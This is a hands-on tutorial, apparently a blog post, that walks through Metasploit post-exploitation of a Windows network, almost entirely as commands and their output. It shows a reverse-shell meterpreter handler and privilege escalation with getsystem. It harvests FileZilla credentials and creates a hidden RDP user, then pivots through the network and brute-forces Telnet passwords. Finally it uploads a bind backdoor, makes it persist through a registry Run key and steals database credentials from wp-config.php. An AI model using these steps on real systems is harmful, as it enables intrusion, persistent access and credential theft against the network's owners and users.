In this tutorials you’ll see things like:

  1. Privilege Escalation
  2. Maintaining Access
  3. Data Harvesting
  4. Weak Password Cracking

NOTE: We already have a meterpreter session

 

 

Start the Handler

We’re assuming we already have a backdoor installed on the remote system. Let’s have our handler running and waiting for remote connections:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.5.40
LHOST => 172.16.5.40
msf exploit(handler) > set LPORT 4466
LPORT => 4466
msf exploit(handler) > exploit
[*] Started reverse handler on 172.16.5.40:4466
[*] Starting the payload handler…
[*] Sending stage (752128 bytes) to 10.32.120.15
[*] Meterpreter session 1 opened (172.16.5.40:4466 -> 10.32.120.15:1034)

 

 

Privilege Escalation

Now that we have our session running some privilege escalation commands, let’s get higher privileges on the system:

meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM

 

 

Map the Network

An easy way to map the internal network is by running arp_scanner module:

meterpreter > run arp_scanner –r 10.32.120.0/24
[*] ARP Scanning 10.32.120.0/24
[*] IP: 10.32.120.1 MAC 00:50:56:b1:eb:b8
[*] IP: 10.32.120.8 MAC 00:50:56:b1:eb:9a
[*] IP: 10.32.120.15 MAC 00:50:56:b1:eb:dd
[*] IP: 10.32.120.17 MAC 00:50:56:b1:eb:de
[*] IP: 10.32.120.13 MAC 00:50:56:b1:eb:df
meterpreter >

As you see there are 5 total hosts on the network.

 

 

Port Scan

Once we’ve listed all internal hosts, we need to run a TCP scan to check for open ports.
That will help us to also identify the role of each system inside the network. To do that, we first need to background our current session and run the tcp_scanner module:

meterpreter > background
[*] Backgrounding session 4…
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 10.32.120.17
RHOSTS => 10.32.120.17
msf auxiliary(tcp) > run
[*] 10.32.120.17:139 – TCP OPEN
[*] 10.32.120.17:135 – TCP OPEN
[*] 10.32.120.17:445 – TCP OPEN

 

 

Data Harvesting

There’s a chain of commands for this purpose and we’ll see a few of them.

Figured out installed application

meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on LS-WINXP
Installed Applications
======================
Name
—-
FileZilla Client 3.5.3
Microsoft Visual C++ 2008 Redistributable – x86
Microsoft Visual C++ 2010 x86 Redistributable
Security Update for Windows XP (KB958644)
VMware Tools
WebFldrs XP
Version
——-
3.5.3
9.0.30729.4148
10.0.40219
1
8.6.0.6261
9.50.7523
[*] Results stored in:
/root/.msf4/loot/20120314093539_default_10.32.120.15_host.application_729
568.txt
meterpreter >

 

We find Filezilla runing on the system and already know that Metasploit has a module to get credentials from FTP software like Filezilla.

meterpreter > run post/multi/gather/filezilla_client_cred
[*] Checking for Filezilla directory in: C:Documents and
SettingsLSAdminApplication Data
[*] Found C:Documents and SettingsLSAdminApplication DataFileZilla
[*] Checking for Filezilla directory in: C:Documents and
SettingsAdministratorApplication Data
[*] Reading sitemanager.xml and recentservers.xml files from C:Documents
and SettingsLSAdminApplication DataFileZilla
[*] Parsing sitemanager.xml
[*] Collected the following credentials:
[*] Server: 10.32.121.23:21
[*] Protocol: FTP
[*] Username: lsuser_ftp
[*] Password: FTPStrongPwd
[*] Parsing recentservers.xml
[*] Collected the following credentials:
[*] Server: 10.32.121.23:21
[*] Protocol: FTP
[*] Username: lsuser_ftp
[*] Password: FTPStrongPwd
meterpreter >

We also found a new host with the IP: 10.32.121.23.

 

 

Exploit the Server

In the previous step, we discovered a new host with IP: 10.32.121.23 running a FTP service on it. Before getting more info about it, let’s try to connect to this system by creating RDP user. For that, we have to interact with our running meterpreter shell and create a new RDP user. Plus, we have to start the RDP service on remote system.

meterpreter > shell
Process 1100 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:Documents and SettingsLSAdmin> net user guest_1 guestpwd /add
net user guest_1 guestpwd /add
C:Documents and SettingsLSAdmin> net localgroup “Remote Desktop Users”
guest_1 /add
net localgroup “Remote Desktop Users” guest_1 /add
The command completed successfully.
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by
Darkoperator
[*] Carlos Perez [email protected]
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it …
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it…
[*] For cleanup use command: run multi_console_command -rc
/root/.msf4/logs/scripts/getgui/clean_up__20120314.4155.rc
meterpreter >

We can login to it with :
root@kali:~# rdesktop 10.32.120.15 -u guest_1
After getting the RDP, you’ll be asked also for the password.

 

 

Port Scan

Let’s run a TCP scan on the server to check further for open ports. To do that, we first need to add a route to the machine – we have to use victim 1 as a bridge.

meterpreter > run autoroute -s 10.32.121.0/24
[*] Adding a route to 10.32.121.0/255.255.255.0…
[+] Added route to 10.32.121.0/255.255.255.0 via 10.32.120.15
[*] Use the -p option to list all active routes
meterpreter >

Now, we can run our scanner module:

meterpreter > background
[*] Backgrounding session 2…
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 10.32.121.23
RHOSTS => 10.32.121.23
msf auxiliary(tcp) > run
[*] [*] [*] [*] [*] [*] …
10.32.121.23:21 – TCP OPEN
10.32.121.23:23 – TCP OPEN
10.32.121.23:80 – TCP OPEN
10.32.121.23:139 – TCP OPEN
10.32.121.23:135 – TCP OPEN
10.32.121.23:445 – TCP OPEN

 

 

Web Server

Previously, we found a web server running on intranet. We will port forward the server to us to access the site:

meterpreter > portfwd add -l 8001 -p 80 -r 10.32.121.23
[*] Local TCP relay created: 0.0.0.0:8001 <-> 10.32.121.23:80
meterpreter >

We should be able to access the internal web site by visiting localhost:8001

 

 

Weak Password Cracking

On previous tasks, we found also port 23 open on 10.32.121.23 system. Without any service detection, we can figure out there’s probably an Telnet service on. Let’s try to crack the password using telnet cracker auxiliary:

msf auxiliary(tcp) > use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set RHOSTS 10.32.121.23
RHOSTS => 10.32.121.23
msf auxiliary(telnet_login) > set PASS_FILE /root/Desktop/pwd.txt
PASS_FILE => /root/Desktop/pwd.txt
msf auxiliary(telnet_login) > set USER_FILE /root/Desktop/username.txt
USER_FILE => /root/Desktop/username.txt
msf auxiliary(telnet_login) > set THREADS 15
THREADS => 15
msf auxiliary(telnet_login) > set USER_AS_PASS false
USER_AS_PASS => false
msf auxiliary(telnet_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(telnet_login) > exploit

[*] 10.32.121.23:23 TELNET – [00009/10000] – Banner: Welcome to Microsoft
Telnet Service login:
[*] 10.32.121.23:23 TELNET – [00009/10000] – Prompt: netadmin password:
[*] 10.32.121.23:23 TELNET – [00009/10000] – Result: The handle is
invalid. Login Failed login:
[*] 10.32.121.23:23 Telnet – [00010/10000] – Attempting:
‘netadmin’:’12345678′
[*] 10.32.121.23:23 TELNET – [00010/10000] – Banner: Welcome to Microsoft
Telnet Service login:
[*] 10.32.121.23:23 TELNET – [00010/10000] – Prompt: netadmin password:
[*] 10.32.121.23:23 TELNET – [00010/10000] – Result: The handle is
invalid. Login Failed login:
[*] 10.32.121.23:23 Telnet – [00011/10000] – Attempting:
‘netadmin’:’abc123′
[*] 10.32.121.23:23 TELNET – [00011/10000] – Banner: Welcome to Microsoft
Telnet Service login:
[*] 10.32.121.23:23 TELNET – [00011/10000] – Prompt: netadmin password:
[*] 10.32.121.23:23 TELNET – [00011/10000] – Result:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:Usersnetadmin>
[+] 10.32.121.23 – SUCCESSFUL LOGIN netadmin : abc123
[*] Attempting to start session 10.32.121.23:23 with netadmin:abc123
[*] Command shell session 2 opened (Local Pipe -> Remote Pipe)
[*] Auxiliary module execution completed
msf auxiliary(telnet_login) >

 

 

Uploading a Backdoor

* Create a backdoor

root@kali:~# cd /pentest/exploits/framework3/
root@kali:/pentest/exploits/framework3# ./msfvenom
windows/meterpreter/bind_tcp LPORT=2444 X > /root/Desktop/msf_bind.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
Length: 298
Options: {“LPORT”=>”2444”}

Upload it to the remote system and execute it through telnet (as we have the credentials):

meterpreter > upload /root/Desktop/msf_bind.exe ‘C:\Documents and
Settings\LSAdmin\Local Settings\Temp\msf_bind.exe’
[*] uploading : /root/Desktop/msf_bind.exe -> C:\Documents and
Settings\LSAdmin\Local Settings\Temp\msf_bind.exe
[*] uploaded
: /root/Desktop/msf_bind.exe -> C:\Documents and
Settings\LSAdmin\Local Settings\Temp\msf_bind.exe
meterpreter >

Run the backdoor using the Telnet session

msf auxiliary(telnet_login) > sessions -i 2
[*] Starting interaction with 2…
C:>cd inetpub
cd inetpub
C:inetpub>cd ftproot
cd ftproot
C:inetpubftproot>msf_bind.exe
msf_bind.exe
C:inetpubftproot>

Next, we set up a new handler and wait for connections:

msf auxiliary(tcp) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set RHOST 10.32.121.23
RHOST => 10.32.121.23
msf exploit(handler) > set LPORT 2444
LPORT => 2444
msf exploit(handler) > exploit
[*] Starting the payload handler…
[*] Started bind handler
[*] Sending stage (752128 bytes)
[*] Meterpreter session 4 opened (172.16.5.40-10.32.120.15:0 ->
10.32.121.23:2444)
meterpreter >

 

 

Privilege Escalation

NOTE: Don’t forget – the first thing you want to do after gaining access to remote system is to escalate you privileges (after migration of course).

meterpreter > getsystem
…got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter >

 

 

Maintaining Access

Getting just high privileges isn’t enough, right? Let’s add a value in the registry in order to run our backdoor on startup so we can access the system any time we want:

meterpreter > reg setval -k
HKLM\software\microsoft\windows\currentversion\run
‘”C:inetpubftprootmsf_bind.exe”‘ -v msf_bind
Successful set msf_bind.
meterpreter >
-d
Where –k indicates the registry key path, -d the value of the value of the key and –v the name.

 

 

Data Harvesting

We know the system is running a web server and is probably connected to a database. Let’s find  usernames and passwords for this site. The easier way is by looking up the config file of the site by downloading it:

meterpreter > ls
Listing: C:inetpubwwwrootintranet
====================================

Mode                              Size        Type     Name
—-                                  —-          —-     —-
40777/rwxrwxrwx       0             dir      .
40777/rwxrwxrwx       0             dir      ..
100666/rw-rw-rw-      397         fil      index.php
100666/rw-rw-rw-      16899    fil      licence.txt
100666/rw-rw-rw-      9202      fil      readme.html


100666/rw-rw-rw-      3982      fil      wp-comments-post.php
post.php                         3165      fil      wp-config.php
100666/rw-rw-rw-      0           dir      wp-content

meterpreter > download wp-config.php /root/Desktop/conf.php
[*] downloading: wp-config.php -> /root/Desktop/conf.php/wp-config.php
[*] downloaded : wp-config.php -> /root/Desktop/conf.php/wp-config.php
meterpreter >

And, finally, the credentials we need:

DB NAME                  intranet
DB USER                   root
DB PASSWORD       LSMySqlDBPwd0905
DB HOST                  10.32.121.12

 

That’s it for now. Hope you find this useful!